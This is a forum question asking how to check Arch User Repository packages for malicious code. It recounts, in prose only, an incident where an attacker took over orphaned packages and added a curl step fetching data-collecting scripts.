How to check an AUR package for malicious code?

Malicious code has been found and deleted later from 3 AUR packages acroread, blaz and minergate (e,g: acroread PKGBUILD detail ). It was found in a commit released by a malicious user by changing the owner of the orphaned AUR package and including a malicious curl command. The curl command will download the main bash script x then the second script u (u.sh) in order to create a systemd service and using a function to collect some system data (non sensitive data) but the scripts can be modified by the attacker to be uploaded sequentially. In practice not all users have the ability to check the PKGBUILD before building any package on their systems for some reasons (require some knowledge , take more time etc...). To understand how it work I have downloaded and uploaded the 2 bash scripts on this pastbin page . What is the easiest way to check an AUR package for malicious code? naked security : Another Linux community with malware woes Malicious Software Packages Found On Arch Linux User Repository